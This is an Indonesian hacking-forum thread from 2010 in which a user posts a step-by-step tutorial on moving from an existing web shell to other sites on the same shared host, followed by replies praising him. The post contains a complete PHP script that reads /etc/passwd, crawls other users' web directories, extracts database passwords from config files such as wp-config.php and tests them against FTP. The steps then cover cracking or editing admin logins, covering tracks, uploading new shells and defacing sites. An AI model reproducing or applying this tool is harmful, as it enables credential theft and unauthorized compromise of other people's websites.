[TUTORIAL] Simple Jumping Shell

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
juara1
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me
Contact:

[TUTORIAL] Simple Jumping Shell

Post by juara1 » Sat May 15, 2010 10:26 am

Hehehe Mav Pertama Kali Sharing Tutorial, kalo uda ngerti mav ya ,, sharing aja
Ni sistemnya cm scanning Dir website yang satu hosting dengan shell yang kita punya ( ga semuanya shell berhasil )
biasanya kalo open read /etc/passwd terbuka seperti dibawah kadang bisa discan

Code: Select all

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
1. siapkan shell yang kamu punya
Image

2. upload scan.php
Image

Code: Select all

    <?php
    echo "<html>";
    echo "<title>JU4RA | CYBER Forum Yogyafree Keren Yach</title><body>";

    set_time_limit(0);
    ##################
    @$passwd=fopen('/etc/passwd','r');
    if (!$passwd) {
    echo "[-] Error : coudn't read /etc/passwd";
    exit;
    }
    $path_to_public=array();
    $users=array();
    $pathtoconf=array();
    $i=0;

    while(!feof($passwd)) {
    $str=fgets($passwd);
    if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
    if (is_readable($dirz)) {
    array_push($users,$username);
    array_push($path_to_public,$dirz);
    }
    }
    }
    $i++;
    }
    ###################

    #########################
    echo "<br><br>";
    echo "<textarea name='main_window' cols=100 rows=20>";

    echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
    echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

    echo "[~] Searching for passwords in config.* files...\n\n";
    foreach ($users as $user) {
    $path="/home/$user/public_html/";
    read_dir($path,$user);
    }

    echo "\n[+] Done\n";

    function read_dir($path,$username) {
    if ($handle = opendir($path)) {
    while (false !== ($file = readdir($handle))) {
    $fpath="$path$file";
    if (($file!='.') and ($file!='..')) {
    if (is_readable($fpath)) {
    $dr="$fpath/";
    if (is_dir($dr)) {
    read_dir($dr,$username);
    }
    else {
    if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='db_connect.php')) {
    $pass=get_pass($fpath);
    if ($pass!='') {
    echo "[+] $fpath\n$pass\n";
    ftp_check($username,$pass);
    }
    }
    }
    }
    }
    }
    }
    }

    function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
    $line=fgets($config);
    if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
    if (strrpos($line,'"'))
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
    else
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
    return $pass;
    }
    }
    }

    function ftp_check($login,$pass) {
    @$ftp=ftp_connect('127.0.0.1');
    if ($ftp) {
    @$res=ftp_login($ftp,$login,$pass);
    if ($res) {
    echo '[FTP] '.$login.':'.$pass."  Success\n";
    }
    else ftp_quit($ftp);
    }
    }

    echo "</textarea><br>";

    echo "</body></html>";
    ?>
3. Buka file scan.php msl: http://targer.com/scan.php
tunggu beberapa saat, emang agak lama
Image

4. Buka shell kamu copykan hasil scannan tadi ke change dir shell kamu ato masukkan dir config ke read file
Image

5. Setelah dapat login Sql dbnya ,, crack dah passwordnya ,, kalo ga bisa di crack edit aja ,,
asal jangan lupa ntar dikembalikan kesemula ,, biar admin ga tau ,,

6. Setelah itu login di admin page webnya

7. upload dah shell baru ,, ato deface ,,

mav kalo kurang jelas ato repost ,,
Thankz for All :circle:
asuuuuuuuuu

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by Digital Cat » Sat May 15, 2010 2:43 pm

wow..

mantep gan..

hebat kamu ini..

paten.. paten..

User avatar
indounderground
Posts: 95
Joined: Thu Sep 07, 2006 6:14 am
Location: Somewhere underwear everywear :P
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by indounderground » Sat May 15, 2010 6:33 pm

salut2
wes ngge tutorial saiki
kalah rek aku

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by shad.hckr » Sat May 15, 2010 7:18 pm

akhirnya mas juara mengeluarkan jurus mautnya.. :love: :love: :love:
tengkyuh ya pak.. :kaca: :kaca: :kaca: :kaca:

User avatar
juara1
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by juara1 » Sun May 16, 2010 7:16 am

indounderground wrote:salut2
wes ngge tutorial saiki
kalah rek aku
wadu master indo ,, sam ,, aq pgn nang ngen e sampean ,, ntar lek mau kesana tak sms ,,
hehhe iseng2 ae sam ,, timbang nganggur ,,, :usap:
asuuuuuuuuu

User avatar
dark_superman
Posts: 13
Joined: Mon Nov 17, 2008 3:44 pm
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by dark_superman » Sun May 16, 2010 9:57 pm

:cry: :cry: wowow

jumping shell ya mantab deh kaka keren :ngakak:

Neo-Gabriel
Posts: 4
Joined: Fri Aug 07, 2009 4:33 pm

Re: [TUTORIAL] Simple Jumping Shell

Post by Neo-Gabriel » Mon May 17, 2010 9:23 pm

Wow, berb0b0t :D ijin mempelajari bro
In the name of Allah. the most gracious, the most merciful..
http://neo-gabriel.uni.cc/v1/ ~ gabriel site's

User avatar
ecko
Posts: 112
Joined: Sat Mar 17, 2007 9:18 pm
Location: CianjuR
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by ecko » Mon May 17, 2010 10:19 pm

Weiiiiiih....mantap kk tutor nya....
:ngakak: :ngakak: :ngakak:

User avatar
aries deris
Posts: 65
Joined: Sat Nov 17, 2007 10:12 pm
Location: neverland

Re: [TUTORIAL] Simple Jumping Shell

Post by aries deris » Mon May 17, 2010 10:41 pm

wew hebat kk
ajarin kk :D
What you believe to be true is false
what you thing to be done is wrong
believe me the battle will never end

User avatar
juara1
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me
Contact:

Re: [TUTORIAL] Simple Jumping Shell

Post by juara1 » Tue May 18, 2010 7:22 am

aries deris wrote:wew hebat kk
ajarin kk :D
walah kk deris ,, wwkkw ,, ris ,, ayo golek JD ,, klunting2 ,, ngelak aq ,, wkwkw
:malumalu: :malumalu: :malumalu:
asuuuuuuuuu

Post Reply

Return to “Web Hacking”